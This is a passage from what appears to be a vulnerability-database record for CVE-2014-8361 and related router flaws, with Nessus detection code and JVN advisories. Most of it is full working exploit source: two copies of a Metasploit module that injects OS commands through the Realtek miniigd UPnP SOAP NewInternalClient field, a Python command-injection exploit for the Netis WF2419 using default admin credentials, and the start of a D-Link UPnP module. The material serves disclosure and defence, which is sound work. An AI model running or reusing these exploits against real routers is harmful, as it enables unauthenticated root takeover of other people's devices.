<devnull[at]s3cur1ty.de>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2014-8361'], \n['ZDI', '15-155'], \n['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], \n['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] \n], \n'DisclosureDate' => 'Apr 24 2015', \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ 'MIPS Little Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSLE \n} \n], \n[ 'MIPS Big Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSBE \n} \n] \n], \n'DefaultTarget' => 0 \n)) \n \nderegister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') \n \nregister_options( \n[ \nOpt::RPORT(52869) # port of UPnP SOAP webinterface \n], self.class) \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/picsdesc.xml' \n}) \nif res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/ \nreturn Exploit::CheckCode::Detected \nend \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown \nend \n \nExploit::CheckCode::Unknown \nend \n \ndef exploit \nprint_status(\"#{peer} - Trying to access the device ...\") \n \nunless check == Exploit::CheckCode::Detected \nfail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\") \nend \n \nprint_status(\"#{peer} - Exploiting...\") \n \nexecute_cmdstager( \n:flavor => :echo, \n:linemax => 50, \n:nodelete => true \n) \nend \n \ndef execute_command(cmd, opts) \nuri = '/wanipcn.xml' \nsoap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' \ndata_cmd = '<?xml version=\"1.0\"?>' + build_soap_req \n \nbegin \nres = send_request_cgi({ \n'uri' => uri, \n'vars_get' => { \n'service' => 'WANIPConn1' \n}, \n'ctype' => 'text/xml', \n'method' => 'POST', \n'headers' => { \n'SOAPAction' => soap_action \n}, \n'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\") \n}) \nreturn res \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\") \nend \nend \n \ndef build_soap_req \nnew_external_port = rand(32767) + 32768 \nnew_internal_port = rand(32767) + 32768 \n \nxml = Document.new \n \nxml.add_element( \n'SOAP-ENV:Envelope', \n{ \n'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', \n'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' \n}) \n \nxml.root.add_element('SOAP-ENV:Body') \n \nbody = xml.root.elements[1] \n \nbody.add_element( \n'm:AddPortMapping', \n{ \n'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' \n}) \n \nport_mapping = body.elements[1] \nport_mapping.add_element('NewLeaseDuration') \nport_mapping.add_element('NewInternalClient') \nport_mapping.add_element('NewEnabled') \nport_mapping.add_element('NewExternalPort') \nport_mapping.add_element('NewRemoteHost') \nport_mapping.add_element('NewProtocol') \nport_mapping.add_element('NewInternalPort') \n \nport_mapping.elements['NewLeaseDuration'].text = '' \nport_mapping.elements['NewInternalClient'].text = 'CMD_HERE' \nport_mapping.elements['NewEnabled'].text = '1' \nport_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\" \nport_mapping.elements['NewRemoteHost'].text = '' \nport_mapping.elements['NewProtocol'].text = 'TCP' \nport_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\" \n \nxml.to_s \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132090/realtek_miniigd_upnp_exec_noauth.rb.txt"}, {"lastseen": "2020-03-02T22:58:24", "description": "", "published": "2020-03-02T00:00:00", "type": "packetstorm", "title": "Netis WF2419 2.2.36123 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19356", "CVE-2019-1337"], "modified": "2020-03-02T00:00:00", "id": "PACKETSTORM:156588", "href": "https://packetstormsecurity.com/files/156588/Netis-WF2419-2.2.36123-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution \n# Exploit Author: Elias Issa \n# Vendor Homepage: http://www.netis-systems.com \n# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 \n# Date: 2020-02-11 \n# Version: WF2419 V2.2.36123 => V2.2.36123 \n# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123 \n# CVE : CVE-2019-19356 \n \n \n# Proof of Concept: python netis_rce.py http://192.168.1.1 \"ls\" \n \n#!/usr/bin/env python \nimport argparse \nimport requests \nimport json \n \ndef exploit(host,cmd): \n# Send Payload \nheaders_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0', \n'Content-Type': 'application/x-www-form-urlencoded'} \npost_data=\"mode_name=netcore_set&tools_type=2&tools_ip_url=|+\"+cmd+\"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0\" \nvulnerable_page = host + \"/cgi-bin-igd/netcore_set.cgi\" \nreq_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value) \nprint('[+] Payload sent') \ntry : \njson_data = json.loads(req_payload.text) \nif json_data[0] == \"SUCCESS\": \nprint('[+] Exploit Sucess') \n# Get Command Result \nprint('[+] Getting Command Output\\n') \nresult_page = host + \"/cgi-bin-igd/netcore_get.cgi\" \npost_data = \"mode_name=netcore_get&no=no\" \nreq_result = requests.post(result_page, data=post_data, headers=headers_value) \njson_data = json.loads(req_result.text) \nresults = json_data[\"tools_results\"] \nprint results.replace(';', '\\n') \nelse: \nprint('[-] Exploit Failed') \nexcept: \nprint(\"[!] You might need to login.\") \n \n# To be implemented \ndef login(user, password): \nprint('To be implemented') \n \ndef main(): \nhost = args.host \ncmd = args.cmd \nuser = args.user \npassword = args.password \n#login(user,password) \nexploit(host,cmd) \n \nif __name__ == \"__main__\": \nap = argparse.ArgumentParser( \ndescription=\"Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]\") \nap.add_argument(\"host\", help=\"URL (Example: http://192.168.1.1).\") \nap.add_argument(\"cmd\", help=\"Command to run.\") \nap.add_argument(\"-u\", \"--user\", help=\"Admin username (Default: admin).\", \ndefault=\"admin\") \nap.add_argument(\"-p\", \"--password\", help=\"Admin password (Default: admin).\", \ndefault=\"admin\") \nargs = ap.parse_args() \nmain() \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156588/netiswf2419-exec.txt"}], "nessus": [{"lastseen": "2021-04-01T05:21:25", "description": "According to its banner, the Realtek Software Development Kit is\nrunning on the remote device. It is, therefore, affected by a flaw in\nthe miniigd SOAP service due to a failure to properly sanitize user\ninput when handling NewInternalClient requests. An unauthenticated,\nremote attacker, using a crafted request, can exploit this to execute\narbitrary code with root level privileges.", "edition": 31, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-05-01T00:00:00", "title": "Realtek SDK miniigd SOAP Service RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-8361"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:realtek:realtek_sdk"], "id": "REALTEK_CVE_2014_8361.NASL", "href": "https://www.tenable.com/plugins/nessus/83185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83185);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2014-8361\");\n script_bugtraq_id(74330);\n script_xref(name:\"ZDI\", value:\"ZDI-15-155\");\n script_xref(name:\"EDB-ID\", value:\"37169\");\n\n script_name(english:\"Realtek SDK miniigd SOAP Service RCE\");\n script_summary(english:\"Checks the banners.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development kit running on the remote device is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the Realtek Software Development Kit is\nrunning on the remote device. It is, therefore, affected by a flaw in\nthe miniigd SOAP service due to a failure to properly sanitize user\ninput when handling NewInternalClient requests. An unauthenticated,\nremote attacker, using a crafted request, can exploit this to execute\narbitrary code with root level privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-155/\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is currently no fix available. As a workaround, restrict access\nto vulnerable devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Realtek SDK Miniigd UPnP SOAP Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realtek:realtek_sdk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"upnp_search.nasl\", \"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"upnp/server\", \"Services/www\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nglobal_var fix, vuln;\nvuln = FALSE;\n\n##\n# Checks if the given server banner is from a vulnerable\n# version of realtek upnpd. If so, a reporting function is\n# called\n#\n# @param port port number of the service being tested\n# @param server server banner advertised on \"port\"\n# @param proto the protocol the port is accessible by (tcp or udp)\n##\nfunction _check_realtek_version(port, server, proto)\n{\n local_var ver, report, banner;\n server = chomp(server);\n ver = eregmatch(string:server, pattern:\"realtek/v((0(\\.[0-9.]+)?|1\\.[0-3](\\.[0-9.]+)?|1)$)\", icase:TRUE);\n\n if (!isnull(ver))\n {\n vuln = TRUE;\n\n banner = ereg_replace(string:server, pattern:'SERVER: *(.+)', replace:\"\\1\", icase:TRUE);\n report =\n '\\n Server banner : ' + banner +\n '\\n Installed version : ' + ver[1] + '\\n';\n\n security_report_v4(port:port,\n proto:proto,\n severity:SECURITY_HOLE,\n extra:report);\n }\n}\n\n# check the server string retrieved via UDP 1900 by upnp_search.nasl\nservers = get_kb_list('upnp/server');\nforeach(server in servers) _check_realtek_version(port:1900, server:server, proto:'udp');\n\n# check any server strings retrieved via HTTP\nwww_ports = get_kb_list('Services/www');\n\nif(!vuln && isnull(www_ports))\n audit(AUDIT_HOST_NOT, 'affected');\n\nforeach port (www_ports)\n{\n server = http_server_header(port:port);\n if (empty_or_null(server)) continue;\n\n _check_realtek_version(port:port, server:server, proto:'tcp');\n}\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-04T05:13:21", "description": "Realtek SDK Miniigd UPnP SOAP Command Execution. CVE-2014-8361. Remote exploit for linux platform", "published": "2015-06-01T00:00:00", "type": "exploitdb", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2015-06-01T00:00:00", "id": "EDB-ID:37169", "href": "https://www.exploit-db.com/exploits/37169/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include REXML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\r\n 'Description' => %q{\r\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\r\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\r\n there is no output for the executed command. This module has been tested successfully on a\r\n Trendnet TEW-731BR router with emulation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8361'],\r\n ['ZDI', '15-155'],\r\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\r\n ],\r\n 'DisclosureDate' => 'Apr 24 2015',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\r\n ], self.class)\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/picsdesc.xml'\r\n })\r\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n Exploit::CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n\r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting...\")\r\n\r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 50,\r\n :nodelete => true\r\n )\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n uri = '/wanipcn.xml'\r\n soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => 'text/xml',\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action\r\n },\r\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def build_soap_req\r\n new_external_port = rand(32767) + 32768\r\n new_internal_port = rand(32767) + 32768\r\n\r\n xml = Document.new\r\n\r\n xml.add_element(\r\n 'SOAP-ENV:Envelope',\r\n {\r\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\r\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\r\n })\r\n\r\n xml.root.add_element('SOAP-ENV:Body')\r\n\r\n body = xml.root.elements[1]\r\n\r\n body.add_element(\r\n 'm:AddPortMapping',\r\n {\r\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\r\n })\r\n\r\n port_mapping = body.elements[1]\r\n port_mapping.add_element('NewLeaseDuration')\r\n port_mapping.add_element('NewInternalClient')\r\n port_mapping.add_element('NewEnabled')\r\n port_mapping.add_element('NewExternalPort')\r\n port_mapping.add_element('NewRemoteHost')\r\n port_mapping.add_element('NewProtocol')\r\n port_mapping.add_element('NewInternalPort')\r\n\r\n port_mapping.elements['NewLeaseDuration'].text = ''\r\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\r\n port_mapping.elements['NewEnabled'].text = '1'\r\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\r\n port_mapping.elements['NewRemoteHost'].text = ''\r\n port_mapping.elements['NewProtocol'].text = 'TCP'\r\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\r\n\r\n xml.to_s\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37169/"}], "jvn": [{"lastseen": "2019-05-29T19:49:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-8361"], "description": "\n ## Description\n\nWSR-300HP provided by BUFFALO INC. is a wireless LAN router. WSR-300HP contains an arbitrary code execution vulnerability.\n\n ## Impact\n\nBy executing a specially crafted request prepared by a remote attacker, arbitrary code may be executed.\n\n ## Solution\n\n**Update the Firmware** \nApply the firmware update according to the information provided by the developer.\n\n ## Products Affected\n\n * WSR-300HP firmware 2.30 and earlier\n", "edition": 4, "modified": "2017-08-08T00:00:00", "published": "2017-08-08T00:00:00", "id": "JVN:74871939", "href": "http://jvn.jp/en/jp/JVN74871939/index.html", "title": "JVN#74871939: WSR-300HP vulnerable to arbitrary code execution", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-09T06:35:42", "bulletinFamily": "info", "cvelist": ["CVE-2021-20680", "CVE-2014-8361"], "description": "\n ## Description\n\nMultiple Aterm products provided by NEC Corporation contain multiple vulnerabilities listed below. \n\n * **Cross-site Scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20680 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | **Base Score: 6.1** \n---|---|--- \nCVSS v2 | AV:N/AC:M/Au:N/C:N/I:P/A:N | **Base Score: 4.3** \n * **OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | **Base Score: 8.8** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:N/C:P/I:P/A:P | **Base Score: 5.8**\n\n ## Impact\n\n * An arbitrary script may be executed on the user's web browser - CVE-2021-20680\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Update the firmware** \n**For the users of WG1900HP2, WG1900HP, WG1800HP4, WG1200HS3, WG1200HS2, WG1200HP3, WG1200HP2, W1200EX, and W1200EX-MS:** \nUpdate the firmware to the latest version according to the information provided by the developer. \nAccording to the developer, the fixed firmware for WG1800HP3 will be released later. Until then, apply the following workarounds. \n \n**Apply workarounds** \n**For the users of WG1200HS, WG1200HP, WF800HP, WF300HP2, WR8165N, W500P, and W300P:** \nAccording to the developer, the update firmware for these pruducts is not planned to be released. \nApplying the following workarounds may mitigate the impacts of the vulnerabilities. \n\n * Change the passwords of the web-based management utility and the Wi-Fi encryption key to stronger ones\n * CVE-2021-20680 \n * When accessing a website, use a URL obtained from a trusted source and bookmark it. For subsequent accesses, use the bookmarked URL.\n * Close the web browser after the operation is finished on the web-based management utility.\n * Delete the credential of the web-based management utility stored in the web browser.\n * CVE-2014-8361 \n * Disable UPnP.\n\n ## Products Affected\n\n * Aterm WG1900HP2 firmware Ver.1.3.1 and earlier\n * Aterm WG1900HP firmware Ver.2.5.1 and earlier\n * Aterm WG1800HP4 firmware Ver.1.3.1 and earlier\n * Aterm WG1800HP3 firmware Ver.1.5.1 and earlier\n * Aterm WG1200HS3 firmware Ver.1.1.2 and earlier - Only affected by CVE-2021-20680 issue\n * Aterm WG1200HS2 firmware Ver.2.5.0 and earlier\n * Aterm WG1200HP3 firmware Ver.1.3.1 and earlier\n * Aterm WG1200HP2 firmware Ver.2.5.0 and earlier\n * Aterm W1200EX firmware Ver.1.3.1 and earlier\n * Aterm W1200EX-MS firmware Ver.1.3.1 and earlier\n * Aterm WG1200HS firmware all versions\n * Aterm WG1200HP firmware all versions\n * Aterm WF800HP firmware all versions\n * Aterm WF300HP2 firmware all versions\n * Aterm WR8165N firmware all versions\n * Aterm W500P firmware all versions\n * Aterm W300P firmware all versions\n", "edition": 1, "modified": "2021-04-09T00:00:00", "published": "2021-04-09T00:00:00", "id": "JVN:67456944", "href": "http://jvn.jp/en/jp/JVN67456944/index.html", "title": "JVN#67456944: Multiple vulnerabilities in multiple Aterm products", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-26T07:42:04", "bulletinFamily": "info", "cvelist": ["CVE-2021-20645", "CVE-2021-20646", "CVE-2021-20643", "CVE-2021-20644", "CVE-2021-20650", "CVE-2021-20649", "CVE-2021-20648", "CVE-2014-8361", "CVE-2021-20647"], "description": "\n ## Description\n\nMultiple products provided by ELECOM CO.,LTD. contain multiple vulnerabilities listed below. \n\n * **Improper Access Control ([CWE-284](<https://cwe.mitre.org/data/definitions/284.html>))** \\- CVE-2021-20643 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N | **Base Score: 5.3** \n---|---|--- \nCVSS v2 | AV:N/AC:L/Au:N/C:N/I:P/A:N | **Base Score: 5.0** \n * **Script injection in web setup page ([CWE-74](<https://cwe.mitre.org/data/definitions/74.html>))** \\- CVE-2021-20644 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | **Base Score: 5.2** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:N/C:N/I:P/A:N | **Base Score: 3.3** \n * **Stored cross-site scripting ([CWE-79](<https://cwe.mitre.org/data/definitions/79.html>))** \\- CVE-2021-20645 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N | **Base Score: 5.4** \n---|---|--- \nCVSS v2 | AV:N/AC:M/Au:S/C:N/I:P/A:N | **Base Score: 3.5** \n * **Cross-site request forgery ([CWE-352](<https://cwe.mitre.org/data/definitions/352.html>))** \\- CVE-2021-20646, CVE-2021-20647, CVE-2021-20650 CVSS v3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N | **Base Score: 4.3** \n---|---|--- \nCVSS v2 | AV:N/AC:H/Au:N/C:N/I:P/A:N | **Base Score: 2.6** \n * **OS command injection ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2021-20648 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H | **Base Score: 6.8** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:S/C:P/I:P/A:P | **Base Score: 5.2** \n * **Improper server certificate verification ([CWE-295](<https://cwe.mitre.org/data/definitions/295.html>))** \\- CVE-2021-20649 CVSS v3 | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N | **Base Score: 4.8** \n---|---|--- \nCVSS v2 | AV:N/AC:H/Au:N/C:P/I:P/A:N | **Base Score: 4.0** \n * **OS command injection via UPnP ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))** \\- CVE-2014-8361 CVSS v3 | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | **Base Score: 8.8** \n---|---|--- \nCVSS v2 | AV:A/AC:L/Au:N/C:P/I:P/A:P | **Base Score: 5.0**\n\n ## Impact\n\n * By processing a specially crafted request, administrative password of the product may be changed - CVE-2021-20643\n * By displaying a specially crafted SSID on the web setup page, arbitrary script may be executed on the user's web browser - CVE-2021-20644\n * An arbitrary script may be executed on a logged in user's web browser - CVE-2021-20645\n * If a user views a malicious page while logged in to the web setup page of the product, arbitrary request may be executed and as a result, the product's settings may be altered and/or telnet daemon may be started - CVE-2021-20646, CVE-2021-20647, CVE-2021-20650\n * An attacker who can access the product may execute arbitrary OS commands - CVE-2021-20648\n * A man-in-the-middle attack may allow an attacker to alter the communication response and as a result, arbitrary OS commands may be executed on the product - CVE-2021-20649\n * When UPnP is enabled, an attacker who can access the product may execute arbitrary OS commands - CVE-2014-8361\n\n ## Solution\n\n**Stop using the products** \nThe developer states these vulnerable products are no longer supported, therefore stop using the products. \n \nAlso according to the developer, the following workarounds may mitigate some of the effects of these issues. \n**Apply a Workaround** \n**CVE-2021-20645, CVE-2021-20646, CVE-2021-20647, CVE-2021-20648, CVE-2021-20650**\n\n * Change web setup page's log in password.\n * Do not access other websites while logged in to the web setup page.\n * Close the web browser after the operation is finished on the web setup page.\n * Delete password of web setup page stored in web browser.\n**CVE-2021-20649**\n\n * Do not execute the firmware's \"Check for update files\" function.\n * For detailed setting change process, refer to [User's Manual](<https://www.elecom.co.jp/support/manual/network/wireless-lan/router/wrc-300febk-s/wrc-300febk-s_users_manual_v2.pdf>) for the products.\n**CVE-2014-8361**\n\n * Disable UPnP.\n\n ## Products Affected\n\n**CVE-2021-20643**\n\n * LD-PS/U1\n**CVE-2021-20644**\n\n * WRC-1467GHBK-A\n**CVE-2021-20645, CVE-2021-20646**\n\n * WRC-300FEBK-A\n**CVE-2021-20647, CVE-2021-20648, CVE-2021-20649**\n\n * WRC-300FEBK-S\n**CVE-2021-20650**\n\n * NCC-EWF100RMWH2\n**CVE-2014-8361**\n\n * WRC-300FEBK\n * WRC-F300NF\n * WRC-300FEBK-S\n", "edition": 1, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "JVN:47580234", "href": "http://jvn.jp/en/jp/JVN47580234/index.html", "title": "JVN#47580234: Multiple vulnerabilities in multiple ELECOM products", "type": "jvn", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-12T22:40:15", "description": "Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on DIR-865 and DIR-645 devices.\n", "published": "2013-07-14T13:42:41", "type": "metasploit", "title": "D-Link Devices UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8361"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/HTTP/DLINK_UPNP_EXEC_NOAUTH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'D-Link Devices UPnP SOAP Command Execution',\n 'Description' => %q{\n Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP\n interface. Since it is a blind OS command injection vulnerability, there is no\n output for the executed command. This module has been tested on DIR-865 and DIR-645 devices.\n },\n 'Author' =>\n [\n 'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module\n 'juan vazquez' # minor help with msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-8361'],\n ['OSVDB', '94924'],\n ['BID', '61005'],\n ['EDB', '26664'],\n ['URL', 'http://www.s3cur1ty.de/m1adv2013-020']\n ],\n 'DisclosureDate' => '2013-07-05',\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'MIPS Little Endian',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSLE\n }\n ],\n [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_MIPSBE\n }\n ],\n ],\n 'DefaultTarget' => 0\n ))\n\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n\n register_options(\n [\n Opt::RPORT(49152) # port of UPnP SOAP webinterface\n ])\n end\n\n def check\n begin\n res = 